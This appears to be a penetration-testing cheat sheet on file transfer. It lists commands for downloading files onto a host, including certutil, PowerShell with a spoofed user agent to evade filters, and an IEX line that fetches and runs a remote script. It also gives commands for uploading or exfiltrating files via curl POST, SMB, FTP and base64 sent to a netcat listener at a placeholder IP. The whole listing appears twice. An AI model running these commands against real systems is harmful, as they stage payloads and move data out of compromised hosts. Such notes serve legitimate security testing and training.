Main

Last updated 7 months ago

Was this helpful?

Download

wget -O <NEW_NAME> <URL_TO_FILE>

curl -o <NEW_NAME> <URL_TO_FILE>

CMD

certutil -urlcache -f http://<IP>/<FILE> <NEW_NAME>

PowerShell

iwr -uri http://<IP>/<FILE> -Outfile <NEW_NAME>

Invoke-WebRequest <URL_SOPRA> -OutFile <NAME_FILE>

# Bypass filters that check user-agent 
$UserAgent = [Microsoft.PowerShell.Commands.PSUserAgent]::Chrome
Invoke-WebRequest <URL_SOPRA> -UserAgent $UserAgent -OutFile <NAME_FILE>

(New-Object Net.WebClient).DownloadFile('<URL_FILE>','<NEW_NAME>')
(New-Object Net.WebClient).DownloadFileAsync('<URL_FILE>','<NEW_NAME>')

SMB

From .

copy \\<IP>\<PATH>\<FILE>

net use n: \\<IP>\<PATH>\<FILE> /user:<USER> <PASS>

FTP

From .

(New-Object Net.WebClient).DownloadFile('ftp://<IP>/<FILE>', '<NEW_NAME>')

Upload

Python Server

Set (and self-signed certificate)

curl -X POST https://<IP>/<DIR> -F 'files=@<PATH_FILE1>' -F 'files=@<PATH_FILE2>' --insecure

PowerShell Script

Set (and self-signed certificate). Download .

IEX(New-Object Net.WebClient).DownloadString('https://raw.githubusercontent.com/juliourena/plaintext/master/Powershell/PSUpload.ps1')

Invoke-FileUpload -Uri http://<IP>:<PORT>/<DIR> -File <FILE>

SMB

Set .

copy <FILE> \\<IP>\DavWWWRoot\   # root dir
copy <FILE> \\<IP>\<DIR>\

On the windows host if SMB share is not available it will try to connect using HTTP. For this reason I can also use a .

FTP

Set with --write.

(New-Object Net.WebClient).UploadFile('ftp://<IP>/<NEW_NAME>', '<FILE>')

Base64

It does not work with strings that are too long.

From File to Base64:

base64 <FILE> -w 0

From Base64 to File:

echo -n <BASE64> | base64 -d > <NAME>

Verify Hash MD5:

md5sum <FILE>

From File to Base64:

[Convert]::ToBase64String((Get-Content -path "<FILE>" -Encoding byte))

From Base64 to File:

[IO.File]::WriteAllBytes("C:\<FILE>", [Convert]::FromBase64String("<BASE64>"))

Verify Hash MD5:

Get-FileHash "<FILE>" -Algorithm MD5 | select Hash

Send Base64 to netcat listener over POST request:

$b64 = [System.convert]::ToBase64String((Get-Content -Path '<FILE>' -Encoding Byte))
Invoke-WebRequest -Uri http://<IP>:<PORT>/ -Method POST -Body $b64

Download

wget -O <NEW_NAME> <URL_TO_FILE>

curl -o <NEW_NAME> <URL_TO_FILE>

CMD

certutil -urlcache -f http://<IP>/<FILE> <NEW_NAME>

PowerShell

iwr -uri http://<IP>/<FILE> -Outfile <NEW_NAME>

Invoke-WebRequest <URL_SOPRA> -OutFile <NAME_FILE>

# Bypass filters that check user-agent 
$UserAgent = [Microsoft.PowerShell.Commands.PSUserAgent]::Chrome
Invoke-WebRequest <URL_SOPRA> -UserAgent $UserAgent -OutFile <NAME_FILE>

(New-Object Net.WebClient).DownloadFile('<URL_FILE>','<NEW_NAME>')
(New-Object Net.WebClient).DownloadFileAsync('<URL_FILE>','<NEW_NAME>')

SMB

From .

copy \\<IP>\<PATH>\<FILE>

net use n: \\<IP>\<PATH>\<FILE> /user:<USER> <PASS>

FTP

From .

(New-Object Net.WebClient).DownloadFile('ftp://<IP>/<FILE>', '<NEW_NAME>')

Upload

Python Server

Set (and self-signed certificate)

curl -X POST https://<IP>/<DIR> -F 'files=@<PATH_FILE1>' -F 'files=@<PATH_FILE2>' --insecure

PowerShell Script

Set (and self-signed certificate). Download .

IEX(New-Object Net.WebClient).DownloadString('https://raw.githubusercontent.com/juliourena/plaintext/master/Powershell/PSUpload.ps1')

Invoke-FileUpload -Uri http://<IP>:<PORT>/<DIR> -File <FILE>

SMB

Set .

copy <FILE> \\<IP>\DavWWWRoot\   # root dir
copy <FILE> \\<IP>\<DIR>\

On the windows host if SMB share is not available it will try to connect using HTTP. For this reason I can also use a .

FTP

Set with --write.

(New-Object Net.WebClient).UploadFile('ftp://<IP>/<NEW_NAME>', '<FILE>')

Base64

It does not work with strings that are too long.

From File to Base64:

base64 <FILE> -w 0

From Base64 to File:

echo -n <BASE64> | base64 -d > <NAME>

Verify Hash MD5:

md5sum <FILE>

From File to Base64:

[Convert]::ToBase64String((Get-Content -path "<FILE>" -Encoding byte))

From Base64 to File:

[IO.File]::WriteAllBytes("C:\<FILE>", [Convert]::FromBase64String("<BASE64>"))

Verify Hash MD5:

Get-FileHash "<FILE>" -Algorithm MD5 | select Hash

Send Base64 to netcat listener over POST request:

$b64 = [System.convert]::ToBase64String((Get-Content -Path '<FILE>' -Encoding Byte))
Invoke-WebRequest -Uri http://<IP>:<PORT>/ -Method POST -Body $b64

Main

Main

Download

CMD

PowerShell

SMB

FTP

Upload

Python Server

PowerShell Script

SMB

FTP

Fileless

Base64

Download

CMD

PowerShell

SMB

FTP

Upload

Python Server

PowerShell Script

SMB

FTP

Fileless

Base64